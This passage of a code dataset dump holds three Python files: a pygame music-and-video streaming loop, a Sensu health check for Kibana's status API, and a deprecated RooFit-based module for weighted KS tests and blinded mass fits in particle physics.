id stringlengths 1 8 | text stringlengths 6 1.05M | dataset_id stringclasses 1
value |
|---|---|---|
11367170 | import pygame
import os
import configparser
import numpy as np
import cv2
from src import music
from src import files_work
def end_music(inp):
inp = False
def main():
# Config init and read config file
conf = files_work.get_conf()
conf.read(os.path.dirname(os.path.abspath(__file__)) + '/conf.ini')
width = int(conf['video']['width']) # Get width from config file
height = int(conf['video']['height']) # Get height from config file
fps = int(conf['video']['fps']) # Get fps from config file
# PyGame init
pygame.init()
pygame.mixer.init()
pygame.font.init()
my_font = pygame.font.Font(None, 30)
screen = pygame.display.set_mode((width, height)) # Creating window
pygame.display.set_caption("Music_Stream")
clock = pygame.time.Clock()
running = True
frame_counter = 0 # Counter for frames in video
song_counter = 0
text_alpha = 0
is_playing = False
img_array = sorted(os.listdir(conf['paths']['img_path'])) # Sorted array of frame files
# Starting main loop
while running:
clock.tick(fps) # Stuff for fps
# Quit condition
for event in pygame.event.get():
if event.type == pygame.QUIT: # Window quit button
running = False
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_ESCAPE: # Esc button
running = False
# Video code block
img = pygame.image.load(conf['paths']['img_path'] + '/' + img_array[frame_counter]) # Reading frame file
img = pygame.transform.scale(img, (width, height)) # Scaling it for window size
screen.blit(img, (0, 0)) # Displaying frame
if frame_counter == len(img_array) - 1: # If we come to last frame
frame_counter = 0 # Start with first frame
frame_counter += 1 # Change frames' number
# Music code block
queue = music.get_music_list() # List of songs
if not pygame.mixer.music.get_busy(): # If song is not playing returns False
if song_counter >= len(queue)-1:
song_counter = 0
# Playing next song
pygame.mixer.music.load(queue[song_counter])
song_name = music.get_name(queue[song_counter])
artist_name = music.get_artist(queue[song_counter])
cover = music.get_cover(queue[song_counter])
print('Playing ' + song_name + ' : ' + artist_name)
pygame.mixer.music.play()
song_counter += 1
text_alpha = 0
music.get_cover(queue[song_counter])
# Display next song
display_name = my_font.render(song_name, 1, (0, 0, 0))
name_alpha = pygame.Surface(display_name.get_size(), pygame.SRCALPHA)
name_alpha.fill((255, 255, 255, text_alpha))
display_name.blit(name_alpha, (0, 0), special_flags=pygame.BLEND_RGBA_MULT)
screen.blit(display_name, (width-300-display_name.get_width(), 70+display_name.get_height()))
display_artist = my_font.render(artist_name, 1, (0, 0, 0))
artist_alpha = pygame.Surface(display_artist.get_size(), pygame.SRCALPHA)
artist_alpha.fill((255, 255, 255, text_alpha))
display_artist.blit(artist_alpha, (0, 0), special_flags=pygame.BLEND_RGBA_MULT)
screen.blit(display_artist, (width-300-display_artist.get_width(), 90+display_artist.get_height()))
cover_surf = pygame.image.load(conf['paths']['tmp_path']+'/cover.png')
cover_surf = pygame.transform.scale(cover_surf, (200, 200))
cover_alpha = pygame.Surface(cover_surf.get_size(), pygame.SRCALPHA)
cover_alpha.fill((255, 255, 255, 255-text_alpha))
cover_surf.blit(cover_alpha, (0, 0))
screen.blit(cover_surf, (width-90-cover_surf.get_width(), 10))
if text_alpha < 255:
text_alpha += 1
pygame.display.update() # Updating PyGame screen
pygame.quit() # Quit from PyGame, close window etc
if __name__ == '__main__':
main()
| StarcoderdataPython |
1900009 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# The MIT License (MIT)
#
# Copyright (c) 2016 <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import argparse
import sys
import traceback
try:
import requests
except ImportError:
from python_extras import requests
ERRORCODE_OK = 0
ERRORCODE_WARNING = 1
ERRORCODE_CRITICAL = 2
ERRORCODE_UNKNOWN = 3
class SensuChecksException(Exception):
def __init__(self, error_code, msg):
super(SensuChecksException, self).__init__((error_code, msg,))
self.error_code = error_code
self.msg = msg
def create_parser():
parser = argparse.ArgumentParser()
parser.add_argument('--host', help='Kibana host (default: localhost)', default='localhost')
parser.add_argument('--port', help='Kibana port (default: 5601)', default='5601')
parser.add_argument('--no-server', help='No checking kibana health status', action='store_true')
parser.add_argument('--no-modules', help='No checking kibana modules health status', action='store_true')
return parser
def parse_args(parser):
config = parser.parse_args()
if config.host.endswith('/'):
config.host = config.host[:-1]
if config.no_server and config.no_modules:
parser.error('Implicit requirements: options --no-server and --no-modules can not be used together')
return config
def kibana_request(config, url):
try:
r = requests.get('http://{}:{}/{}'.format(config.host, config.port, url))
r.raise_for_status()
result = r.json()
except requests.exceptions.RequestException as e:
response_msg = ''
if e.response is not None:
response_msg = 'status_code: {}, headers={}'.format(e.response.status_code, e.response.headers)
raise SensuChecksException(ERRORCODE_UNKNOWN, 'UNKNOWN: HTTP error occured, msg={}, {}'.format(e, response_msg))
except requests.exceptions.BaseHTTPError as e:
raise SensuChecksException(ERRORCODE_UNKNOWN, 'UNKNOWN: HTTP error occured, {}'.format(e))
return result
def check_kibana_health(metrics):
health_state = metrics['status']['overall']['state']
health_title = metrics['status']['overall']['title']
health_nickname = metrics['status']['overall']['nickname']
if 'red' == health_state:
raise SensuChecksException(ERRORCODE_CRITICAL, 'CRITICAL: Kibana health status state={}, title={}, msg={}'.format(health_state, health_title, health_nickname))
elif 'yellow' == health_state:
raise SensuChecksException(ERRORCODE_WARNING, 'WARNING: Kibana health status state={}, title={}, msg={}'.format(health_state, health_title, health_nickname))
elif 'green' != health_state:
raise SensuChecksException(ERRORCODE_UNKNOWN, 'UNKNOWN: Kibana health status state={}, title={}, msg={}'.format(health_state, health_title, health_nickname))
return 'Kibana health status state={}, title={}, msg={}'.format(health_state, health_title, health_nickname)
def check_modules_health(metrics):
for item in metrics['status']['statuses']:
health_state = item['state']
msg = item['message']
name = item['name']
if 'red' == health_state:
raise SensuChecksException(ERRORCODE_CRITICAL, 'CRITICAL: Kibana module "{}" health status state={}, msg={}'.format(name, health_state, msg))
elif 'yellow' == health_state:
raise SensuChecksException(ERRORCODE_WARNING, 'WARNING: Kibana module "{}" health status state={}, msg={}'.format(name, health_state, msg))
elif 'green' != health_state:
raise SensuChecksException(ERRORCODE_UNKNOWN, 'UNKNOWN: Kibana module "{}" health status state={}, msg={}'.format(name, health_state, msg))
return 'Kibana modules health status state is green'
def check_kibana(config, metrics):
status_server = ''
status_modules = ''
if not config.no_server:
status_server = check_kibana_health(metrics)
if not config.no_modules:
status_modules = check_modules_health(metrics)
raise SensuChecksException(ERRORCODE_OK, ';'.join(list(filter(bool, (status_server,status_modules)))))
def main():
try:
parser = create_parser()
config = parse_args(parser)
metrics = kibana_request(config, 'api/status')
check_kibana(config, metrics)
except SensuChecksException as e:
print(e.msg)
sys.exit(e.error_code)
except Exception:
print('UNKNOWN: unexpected exception occured')
traceback.print_exc()
sys.exit(ERRORCODE_UNKNOWN)
if __name__ == '__main__':
main()
| StarcoderdataPython |
3342238 | <gh_stars>1-10
"""
@author: <NAME> 'Mayou36'
This modul contains several tools like fits.
DEPRECEATED! USE OTHER MODULES LIKE rd.data, rd.ml, rd.reweight, rd.score and rd.stat
DEPRECEATED!DEPRECEATED!DEPRECEATED!DEPRECEATED!DEPRECEATED!
"""
from .. import config as cfg # noqa
import numpy as np
# from raredecay.globals_ import out
from .. import meta_config as meta_cfg
from ..tools import dev_tool
# import matplotlib.pyplot as plt
def ks_2samp_ds(data1, data2, column):
"""
Parameters
----------
data1 : |hepds_type|
Data set one for the 2sample test
data2 : |hepds_type|
Data set two for the 2sample test
column : str
Which column to use. Has to be the same name in both data sets
Returns
-------
numeric
Return the K-S two sample test hypothesis score.
"""
# Python 2/3 compatibility, str
column = str(column)
# create data from HEPDS
data1, _, weights1 = data1.make_dataset(columns=column)
data2, _, weights2 = data2.make_dataset(columns=column)
weights1 = np.array(weights1)
weights2 = np.array(weights2)
data1 = np.array(data1[column].values)
data2 = np.array(data2[column].values)
# call ks_test
ks_score = ks_2samp(data1=data1, data2=data2, weights1=weights1, weights2=weights2)
return ks_score
def ks_2samp(data1, data2, weights1=None, weights2=None):
"""Weighted two sample Komlogorov-Smirnov hypothesis test.
The weighted version of the Kolmogorov-Smirnov test if two samples
*data1* and *data2* with weights *weights1* and *weights2* respectively
are drawn from the same continuos distribution.
Parameters
----------
data1 : array-like
The first distribution.
data2 : array-like
The second distribution.
weights1 : array-like
The weights of the first distribution. The length has to be equal
to the length of *data1*.
weights2 : array-like
The weights of the second distribution. The length has to be equal
to the length of *data2*.
Returns
-------
numeric
Return the K-S two sample test hypothesis score.
"""
# check and set input
weights1 = (
np.ones(len(data1))
if dev_tool.is_in_primitive(weights1)
else np.array(weights1)
)
weights2 = (
np.ones(len(data2))
if dev_tool.is_in_primitive(weights2)
else np.array(weights2)
)
data1 = np.array(data1)
data2 = np.array(data2)
# start calculation
ix1 = np.argsort(data1)
ix2 = np.argsort(data2)
data1 = data1[ix1]
data2 = data2[ix2]
weights1 = weights1[ix1]
weights2 = weights2[ix2]
data = np.concatenate([data1, data2])
cwei1 = np.hstack([0, np.cumsum(weights1) / sum(weights1)])
cwei2 = np.hstack([0, np.cumsum(weights2) / sum(weights2)])
cdf1we = cwei1[[np.searchsorted(data1, data, side="right")]]
cdf2we = cwei2[[np.searchsorted(data2, data, side="right")]]
return np.max(np.abs(cdf1we - cdf2we))
ks_2samp_ds.__doc__ = ks_2samp.__doc__.split("Parameter", 1)[0] + ks_2samp_ds.__doc__
def ad_2samp(data1, data2, column):
# Python 2/3 compatibility, str
column = str(column)
# prepare data
data1, targets1, weights1 = data1.make_dataset(columns=column)
data2, targets2, weights2 = data2.make_dataset(columns=column)
weights1 = np.array(weights1)
weights2 = np.array(weights2)
data1 = np.array(data1[column].values)
data2 = np.array(data2[column].values)
# sort data
ix1 = np.argsort(data1)
ix2 = np.argsort(data2)
data1 = data1[ix1]
data2 = data2[ix2]
weights1 = weights1[ix1]
weights2 = weights2[ix2]
n = np.sum(weights1)
m = np.sum(weights2)
def _anderson_2samp_right(samples, data_sorted, data_unique_sorted, n_events):
n_tot = sum(n_events)
def fit_mass(
data,
column,
x,
sig_pdf=None,
bkg_pdf=None,
n_sig=None,
n_bkg=None,
blind=False,
nll_profile=False,
second_storage=None,
log_plot=False,
pulls=True,
sPlot=False,
bkg_in_region=False,
importance=3,
plot_importance=3,
):
"""Fit a given pdf to a variable distribution.
A quite versatile function doing several things connected to fitting.
Parameters
----------
data : |hepds_type|
The data containing the variable to fit to
column : str
The name of the column to fit the pdf to
x : RooRealVar
The RooRealVar to fit to.
sig_pdf : RooFit pdf
The signal Probability Density Function. The variable to fit to has
to be named 'x'.
bkg_pdf : RooFit pdf
The background Probability Density Function. The variable to fit to has
to be named 'x'.
n_sig : None or numeric
The number of signals in the data. If it should be fitted, use None.
n_bkg : None or numeric
The number of background events in the data.
If it should be fitted, use None.
blind : boolean or tuple(numberic, numberic)
If False, the data is fitted. If a tuple is provided, the values are
used as the lower (the first value) and the upper (the second value)
limit of a blinding region, which will be omitted in plots.
Additionally, no true number of signal will be returned but only fake.
nll_profile : boolean
If True, a Negative Log-Likelihood Profile will be generated. Does not
work with blind fits.
second_storage : |hepds_type|
A second data-storage that will be concatenated with the first one.
importance : |importance_type|
|importance_docstring|
plot_importance : |plot_importance_type|
|plot_importance_docstring|
Return
------
tuple(numerical, numerical)
Return the number of signals and the number of backgrounds in the
signal-region. If a blind fit is performed, the signal will be a fake
number. If no number of background events is required, -999 will be
returned.
"""
import ROOT
from ROOT import (
RooRealVar,
RooArgList,
RooArgSet,
RooAddPdf,
RooDataSet,
RooAbsReal,
)
from ROOT import RooFit, RooCBShape, RooExponential
from ROOT import RooGaussian, RooMinuit
from ROOT import (
TCanvas,
) # HACK to prevent not plotting canvas by root_numpy import. BUG.
from root_numpy import array2tree
from ROOT import RooCategory, RooUnblindPrecision
# Python 2/3 compatibility, str
column = dev_tool.entries_to_str(column)
if not (isinstance(column, str) or len(column) == 1):
raise ValueError(
"Fitting to several columns " + str(column) + " not supported."
)
if type(sig_pdf) == type(bkg_pdf) == None:
raise ValueError("sig_pdf and bkg_pdf are both None-> no fit possible")
if blind is not False:
lower_blind, upper_blind = blind
blind = True
n_bkg_below_sig = -999
# create data
data_name = data.name
data_array, _t1, _t2 = data.make_dataset(second_storage, columns=column)
del _t1, _t2
# double crystalball variables
min_x, max_x = min(data_array[column]), max(data_array[column])
# x = RooRealVar("x", "x variable", min_x, max_x)
# create data
data_array = np.array([i[0] for i in data_array.as_matrix()])
try:
data_array.dtype = [("x", np.float64)]
except:
data_array.dtype = [("x", np.float64)]
print("hack needed")
tree1 = array2tree(data_array, "x")
data = RooDataSet("data", "Data", RooArgSet(x), RooFit.Import(tree1))
# # TODO: export somewhere? does not need to be defined inside...
# mean = RooRealVar("mean", "Mean of Double CB PDF", 5280, 5100, 5600)#, 5300, 5500)
# sigma = RooRealVar("sigma", "Sigma of Double CB PDF", 40, 0.001, 200)
# alpha_0 = RooRealVar("alpha_0", "alpha_0 of one side", 5.715)#, 0, 150)
# alpha_1 = RooRealVar("alpha_1", "alpha_1 of other side", -4.019)#, -200, 0.)
# lambda_0 = RooRealVar("lambda_0", "Exponent of one side", 3.42)#, 0, 150)
# lambda_1 = RooRealVar("lambda_1", "Exponent of other side", 3.7914)#, 0, 500)
#
# # TODO: export somewhere? pdf construction
# frac = RooRealVar("frac", "Fraction of crystal ball pdfs", 0.479, 0.01, 0.99)
#
# crystalball1 = RooCBShape("crystallball1", "First CrystalBall PDF", x,
# mean, sigma, alpha_0, lambda_0)
# crystalball2 = RooCBShape("crystallball2", "Second CrystalBall PDF", x,
# mean, sigma, alpha_1, lambda_1)
# doubleCB = RooAddPdf("doubleCB", "Double CrystalBall PDF",
# crystalball1, crystalball2, frac)
# n_sig = RooRealVar("n_sig", "Number of signals events", 10000, 0, 1000000)
# test input
if n_sig == n_bkg == 0:
raise ValueError("n_sig as well as n_bkg is 0...")
if n_bkg is None:
n_bkg = RooRealVar("n_bkg", "Number of background events", 10000, 0, 500000)
elif n_bkg >= 0:
n_bkg = RooRealVar("n_bkg", "Number of background events", int(n_bkg))
else:
raise ValueError("n_bkg is not >= 0 or None")
if n_sig is None:
n_sig = RooRealVar("n_sig", "Number of signal events", 1050, 0, 200000)
# START BLINDING
blind_cat = RooCategory("blind_cat", "blind state category")
blind_cat.defineType("unblind", 0)
blind_cat.defineType("blind", 1)
if blind:
blind_cat.setLabel("blind")
blind_n_sig = RooUnblindPrecision(
"blind_n_sig",
"blind number of signals",
"wasistdas",
n_sig.getVal(),
10000,
n_sig,
blind_cat,
)
else:
# blind_cat.setLabel("unblind")
blind_n_sig = n_sig
print("n_sig value " + str(n_sig.getVal()))
# END BLINDING
elif n_sig >= 0:
n_sig = RooRealVar("n_sig", "Number of signal events", int(n_sig))
else:
raise ValueError("n_sig is not >= 0")
# if not blind:
# blind_n_sig = n_sig
# # create bkg-pdf
# lambda_exp = RooRealVar("lambda_exp", "lambda exp pdf bkg", -0.00025, -1., 1.)
# bkg_pdf = RooExponential("bkg_pdf", "Background PDF exp", x, lambda_exp)
if blind:
comb_pdf = RooAddPdf(
"comb_pdf",
"Combined DoubleCB and bkg PDF",
RooArgList(sig_pdf, bkg_pdf),
RooArgList(blind_n_sig, n_bkg),
)
else:
comb_pdf = RooAddPdf(
"comb_pdf",
"Combined DoubleCB and bkg PDF",
RooArgList(sig_pdf, bkg_pdf),
RooArgList(n_sig, n_bkg),
)
# create test dataset
# mean_gauss = RooRealVar("mean_gauss", "Mean of Gaussian", 5553, -10000, 10000)
# sigma_gauss = RooRealVar("sigma_gauss", "Width of Gaussian", 20, 0.0001, 300)
# gauss1 = RooGaussian("gauss1", "Gaussian test dist", x, mean_gauss, sigma_gauss)
# lambda_data = RooRealVar("lambda_data", "lambda exp data", -.002)
# exp_data = RooExponential("exp_data", "data example exp", x, lambda_data)
# frac_data = RooRealVar("frac_data", "Fraction PDF of data", 0.15)
#
# data_pdf = RooAddPdf("data_pdf", "Data PDF", gauss1, exp_data, frac_data)
# data = data_pdf.generate(RooArgSet(x), 30000)
# data.printValue()
# xframe = x.frame()
# data_pdf.plotOn(xframe)
# print "n_cpu:", meta_cfg.get_n_cpu()
# input("test")
# comb_pdf.fitTo(data, RooFit.Extended(ROOT.kTRUE), RooFit.NumCPU(meta_cfg.get_n_cpu()))
# HACK to get 8 cores in testing
c5 = TCanvas("c5", "RooFit pdf not fit vs " + data_name)
c5.cd()
x_frame1 = x.frame()
# data.plotOn(x_frame1)
# comb_pdf.pdfList()[1].plotOn(x_frame1)
if __name__ == "__main__":
n_cpu = 8
else:
n_cpu = meta_cfg.get_n_cpu()
print("n_cpu = ", n_cpu)
# HACK
# n_cpu = 8
result_fit = comb_pdf.fitTo(
data,
RooFit.Minos(ROOT.kTRUE),
RooFit.Extended(ROOT.kTRUE),
RooFit.NumCPU(n_cpu),
)
# HACK end
if bkg_in_region:
x.setRange("signal", bkg_in_region[0], bkg_in_region[1])
bkg_pdf_fitted = comb_pdf.pdfList()[1]
int_argset = RooArgSet(x)
# int_argset = x
# int_argset.setRange("signal", bkg_in_region[0], bkg_in_region[1])
integral = bkg_pdf_fitted.createIntegral(
int_argset, RooFit.NormSet(int_argset), RooFit.Range("signal")
)
bkg_cdf = bkg_pdf_fitted.createCdf(int_argset, RooFit.Range("signal"))
bkg_cdf.plotOn(x_frame1)
# integral.plotOn(x_frame1)
n_bkg_below_sig = integral.getVal(int_argset) * n_bkg.getVal()
x_frame1.Draw()
if plot_importance >= 3:
c2 = TCanvas("c2", "RooFit pdf fit vs " + data_name)
c2.cd()
x_frame = x.frame()
# if log_plot:
# c2.SetLogy()
# x_frame.SetTitle("RooFit pdf vs " + data_name)
x_frame.SetTitle(data_name)
if pulls:
pad_data = ROOT.TPad("pad_data", "Pad with data and fit", 0, 0.33, 1, 1)
pad_pulls = ROOT.TPad("pad_pulls", "Pad with data and fit", 0, 0, 1, 0.33)
pad_data.SetBottomMargin(0.00001)
pad_data.SetBorderMode(0)
if log_plot:
pad_data.SetLogy()
pad_pulls.SetTopMargin(0.00001)
pad_pulls.SetBottomMargin(0.2)
pad_pulls.SetBorderMode(0)
pad_data.Draw()
pad_pulls.Draw()
pad_data.cd()
else:
if log_plot:
c2.SetLogy()
if blind:
# HACK
column = "x"
# END HACK
x.setRange("lower", min_x, lower_blind)
x.setRange("upper", upper_blind, max_x)
range_str = "lower,upper"
lower_cut_str = (
str(min_x) + "<=" + column + "&&" + column + "<=" + str(lower_blind)
)
upper_cut_str = (
str(upper_blind) + "<=" + column + "&&" + column + "<=" + str(max_x)
)
sideband_cut_str = "(" + lower_cut_str + ")" + "||" + "(" + upper_cut_str + ")"
n_entries = data.reduce(sideband_cut_str).numEntries() / data.numEntries()
# raw_input("n_entries: " + str(n_entries))
if plot_importance >= 3:
data.plotOn(
x_frame, RooFit.CutRange(range_str), RooFit.NormRange(range_str)
)
comb_pdf.plotOn(
x_frame,
RooFit.Range(range_str),
RooFit.Normalization(n_entries, RooAbsReal.Relative),
RooFit.NormRange(range_str),
)
if pulls:
# pull_hist(pull_frame=x_frame, pad_data=pad_data, pad_pulls=pad_pulls)
x_frame_pullhist = x_frame.pullHist()
else:
if plot_importance >= 3:
data.plotOn(x_frame)
comb_pdf.plotOn(x_frame)
if pulls:
pad_pulls.cd()
x_frame_pullhist = x_frame.pullHist()
pad_data.cd()
comb_pdf.plotOn(
x_frame,
RooFit.Components(sig_pdf.namePtr().GetName()),
RooFit.LineStyle(ROOT.kDashed),
)
comb_pdf.plotOn(
x_frame,
RooFit.Components(bkg_pdf.namePtr().GetName()),
RooFit.LineStyle(ROOT.kDotted),
)
# comb_pdf.plotPull(n_sig)
if plot_importance >= 3:
x_frame.Draw()
if pulls:
pad_pulls.cd()
x_frame.SetTitleSize(0.05, "Y")
x_frame.SetTitleOffset(0.7, "Y")
x_frame.SetLabelSize(0.04, "Y")
# c11 = TCanvas("c11", "RooFit\ pulls" + data_name)
# c11.cd()
# frame_tmp = x_frame
frame_tmp = x.frame()
# frame_tmp.SetTitle("significance")
frame_tmp.SetTitle(r"Roofit\ pulls\ " + data_name)
frame_tmp.addObject(x_frame_pullhist)
frame_tmp.SetMinimum(-5)
frame_tmp.SetMaximum(5)
# frame_tmp.GetYaxis().SetTitle("significance")
frame_tmp.GetYaxis().SetNdivisions(5)
frame_tmp.SetTitleSize(0.1, "X")
frame_tmp.SetTitleOffset(1, "X")
frame_tmp.SetLabelSize(0.1, "X")
frame_tmp.SetTitleSize(0.1, "Y")
frame_tmp.SetTitleOffset(0.5, "Y")
frame_tmp.SetLabelSize(0.1, "Y")
frame_tmp.Draw()
# raw_input("")
if not blind and nll_profile:
# nll_range = RooRealVar("nll_range", "Signal for nLL", n_sig.getVal(),
# -10, 2 * n_sig.getVal())
sframe = n_sig.frame(RooFit.Bins(20), RooFit.Range(1, 1000))
# HACK for best n_cpu
lnL = comb_pdf.createNLL(data, RooFit.NumCPU(8))
# HACK end
lnProfileL = lnL.createProfile(ROOT.RooArgSet(n_sig))
lnProfileL.plotOn(sframe, RooFit.ShiftToZero())
c4 = TCanvas("c4", "NLL Profile")
c4.cd()
# input("press ENTER to show plot")
sframe.Draw()
if plot_importance >= 3:
pass
params = comb_pdf.getVariables()
params.Print("v")
# print bkg_cdf.getVal()
if sPlot:
sPlotData = ROOT.RooStats.SPlot(
"sPlotData",
"sPlotData",
data, # variable fitted to, RooDataSet
comb_pdf, # fitted pdf
ROOT.RooArgList(
n_sig,
n_bkg,
# NSigB0s
),
)
sweights = np.array(
[sPlotData.GetSWeight(i, "n_sig") for i in range(data.numEntries())]
)
return n_sig.getVal(), n_bkg_below_sig, sweights
if blind:
return blind_n_sig.getVal(), n_bkg_below_sig, comb_pdf
else:
return n_sig.getVal(), n_bkg_below_sig, comb_pdf
# nll_plot = RooRealVar("nll_plot", "NLL plotting range", 0.01, 0.99)
# nll_frame = nll_plot.frame()
# my_nll = comb_pdf.createNLL(data, RooFit.NumCPU(8))
# RooMinuit(my_nll).migrad()
# my_nll.plotOn(nll_frame)
# nll_frame.Draw()
# data.plotOn(xframe)
# comb_pdf.plotOn(xframe)
# xframe.Draw()
# return xframe
def pull_hist(pull_frame, pad_data, pad_pulls):
"""Add pulls into the current pad."""
# import ROOT
# from ROOT import RooRealVar, RooArgList, RooArgSet, RooAddPdf, RooDataSet, RooAbsReal
# from ROOT import RooFit, RooCBShape, RooExponential
# from ROOT import RooGaussian, RooMinuit
# from ROOT import TCanvas # HACK to prevent not plotting canvas by root_numpy import. BUG.
# from root_numpy import array2tree
# from ROOT import RooCategory, RooUnblindPrecision
pad_data.cd()
dataHist = pull_frame.getHist("datahistogram")
curve1 = pull_frame.getObject(
1
) # 1 is index in the list of RooPlot items (see printout from massplot->Print("V")
curve2 = pull_frame.getObject(2)
hresid1 = dataHist.makePullHist(curve1, True)
hresid2 = dataHist.makePullHist(curve2, True)
# RooHist* hresid = massplot->pullHist("datahistogram","blindtot")
pad_pulls.cd()
# resid = M_OS.frame()
pull_frame.addPlotable(hresid1, "P")
pull_frame.addPlotable(hresid2, "P")
pull_frame.SetTitle("")
# pull_frame.GetXaxis().SetTitle("#it{m}(#it{#pi}^{ #plus}#it{#pi}^{ #minus}) [MeV/#it{c}^{2}]")
# gStyle->SetPadLeftMargin(0.1)
def metric_vs_cut_fitted(
data,
predict_col,
fit_col,
sig_pdf,
bkg_pdf,
x,
region,
second_storage=None,
metric="punzi",
n_sig=None,
n_bkg=None,
stepsize=0.025,
plot_importance=3,
):
"""Calculate a metric vs a given cut by estimating the bkg from the fit.
Parameters
----------
data : |hepds_type|
predict_col : str
fit_col : str
region : tuple(numerical, numerical)
The lower and upper points to integrate over.
x : RooRealVar
"""
from raredecay.tools.metrics import punzi_fom, precision_measure
predict_col = dev_tool.entries_to_str(predict_col)
fit_col = dev_tool.entries_to_str(fit_col)
metric_name = metric
if metric == "punzi":
metric = punzi_fom
elif metric == "precision":
metric = precision_measure
# TODO: convert meric strings to metric
n_steps = int(np.floor_divide(1, stepsize))
if n_steps < 1:
raise ValueError("stepsize has to be smaller then 1, not", stepsize)
cuts = np.linspace(0, 1, num=n_steps, endpoint=False)
plots = int(10 / n_steps)
current_plot = 0
if not isinstance(predict_col, str) or not isinstance(fit_col, str):
raise TypeError("predict_col and/or fit_col is not a string but has to be.")
scores = []
for cut in cuts:
if plot_importance > 2:
temp_plot_importance = plot_importance if plots > current_plot else 0
temp_data = data.copy_storage(columns=[predict_col, fit_col], add_to_name="")
temp_df = temp_data.pandasDF()
temp_df = temp_df[cut < temp_df[predict_col]]
temp_data.set_data(temp_df)
n_sig_weighted = sum(temp_data.get_weights()[temp_data.get_targets() == 1])
if second_storage is not None:
temp_second_storage = second_storage.copy_storage(
columns=[predict_col, fit_col], add_to_name=""
)
temp_df = temp_second_storage.pandasDF()
temp_df = temp_df[cut < temp_df[predict_col]]
temp_second_storage.set_data(temp_df)
n_sig_weighted += sum(
temp_second_storage.get_weights()[
temp_second_storage.get_targets() == 1
]
)
else:
temp_second_storage = second_storage
n_sig_fit, n_bkg_fit = fit_mass(
data=temp_data,
column=fit_col,
x=x,
sig_pdf=sig_pdf,
bkg_pdf=bkg_pdf,
n_sig=n_sig,
n_bkg=n_bkg,
blind=False,
nll_profile=False,
second_storage=temp_second_storage,
plot_importance=temp_plot_importance,
bkg_in_region=region,
)
scores.append(metric(n_signal=n_sig_weighted, n_background=n_bkg_fit))
return cuts, scores
if __name__ == "__main__":
import ROOT
from ROOT import (
RooRealVar,
RooArgList,
RooArgSet,
RooAddPdf,
RooDataSet,
RooAbsReal,
)
from ROOT import RooFit, RooCBShape, RooExponential
from ROOT import RooGaussian, RooMinuit
from ROOT import (
TCanvas,
) # HACK to prevent not plotting canvas by root_numpy import. BUG.
from root_numpy import array2tree
from ROOT import RooCategory, RooUnblindPrecision
# data = RooDataSet("data", )
from raredecay.tools.data_storage import HEPDataStorage
import pandas as pd
import matplotlib.pyplot as plt
# np.random.seed(40)
mode = "fit"
# mode = 'fit_metric'
# mode = "sPlot"
# mode = 'ks'
# create signal pdf BEGIN
lower_bound = 4800
# lower_bound = 5000
x = RooRealVar("x", "x variable", lower_bound, 6000)
# x = RooRealVar("x", "x variable", 4800, 6000)
# TODO: export somewhere? does not need to be defined inside...
mean = RooRealVar(
"mean", "Mean of Double CB PDF", 5280, 5270, 5290
) # , 5300, 5500)
sigma = RooRealVar("sigma", "Sigma of Double CB PDF", 40, 0, 45)
alpha_0 = RooRealVar("alpha_0", "alpha_0 of one side", 40, 30, 50)
alpha_1 = RooRealVar("alpha_1", "alpha_1 of other side", -40, -50, -30.0)
lambda_0 = RooRealVar("lambda_0", "Exponent of one side", 40, 30, 50)
lambda_1 = RooRealVar("lambda_1", "Exponent of other side", 40, 30, 50)
# TODO: export somewhere? pdf construction
frac = RooRealVar("frac", "Fraction of crystal ball pdfs", 0.479, 0.01, 0.99)
crystalball1 = RooCBShape(
"crystallball1", "First CrystalBall PDF", x, mean, sigma, alpha_0, lambda_0
)
crystalball2 = RooCBShape(
"crystallball2", "Second CrystalBall PDF", x, mean, sigma, alpha_1, lambda_1
)
doubleCB = RooAddPdf(
"doubleCB", "Double CrystalBall PDF", crystalball1, crystalball2, frac
)
# create signal pdf END
# create bkg-pdf BEGIN
lambda_exp = RooRealVar(
"lambda_exp", "lambda exp pdf bkg", -0.002, -10.0, -0.000001
)
bkg_pdf = RooExponential("bkg_pdf", "Background PDF exp", x, lambda_exp)
# create bkg-pdf END
n_sig = 25000
data = pd.DataFrame(
np.random.normal(loc=5280, scale=37, size=(n_sig, 3)),
columns=["x", "y", "pred"],
)
# data['pred'] = np.array([min((abs(y), 0.99)) for y in np.random.normal(loc=0.6, scale=0.25, size=n_sig)])
bkg_data = np.array(
[
i
for i in (np.random.exponential(scale=300, size=(7500, 3)) + 4800)
if i[0] < 6000
]
)
bkg_data[:, 2] = np.array(
[
min((abs(y), 0.96))
for y in np.random.normal(loc=0.4, scale=0.4, size=len(bkg_data))
]
)
data = pd.concat(
[data, pd.DataFrame(bkg_data, columns=["x", "y", "pred"])], ignore_index=True
)
data = HEPDataStorage(
data, target=np.concatenate((np.ones(n_sig), np.zeros(len(bkg_data))))
)
data_copy = data.copy_storage()
if mode == "fit":
fit_result = fit_mass(
data=data,
column="x",
sig_pdf=doubleCB,
x=x,
bkg_pdf=bkg_pdf,
# blind=False,
blind=(5100, 5380),
plot_importance=4, # bkg_in_region=(5100, 5380)
)
print(fit_result)
print("True values: nsig =", n_sig, " n_bkg =", len(bkg_data))
elif mode == "fit_metric":
result = metric_vs_cut_fitted(
data=data,
predict_col="pred",
fit_col="x",
sig_pdf=doubleCB,
bkg_pdf=bkg_pdf,
x=x,
region=(5100, 5380),
stepsize=0.01,
)
print(result)
plt.plot(*result)
elif mode == "sPlot":
fit_result = fit_mass(
data=data,
column="x",
sig_pdf=doubleCB,
x=x,
bkg_pdf=bkg_pdf,
blind=False,
plot_importance=1, # bkg_in_region=(5100, 5380)
sPlot=True,
)
